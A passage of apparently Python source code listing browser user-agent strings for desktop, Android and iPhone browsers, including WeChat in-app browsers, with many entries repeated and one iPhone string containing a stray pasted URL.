'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0', 'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN', 'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
"Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
"Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN']
userAgents = [
'Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1', 'Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3',
'Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)',
'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5', 'Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20', 'Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2', 'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1', 'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ',
'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre',
'Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2', 'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0', 'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1',
'Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15',
'Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko',
'Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16',
'Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025',
'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1',
'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0', 'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN', 'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
"Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
"Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
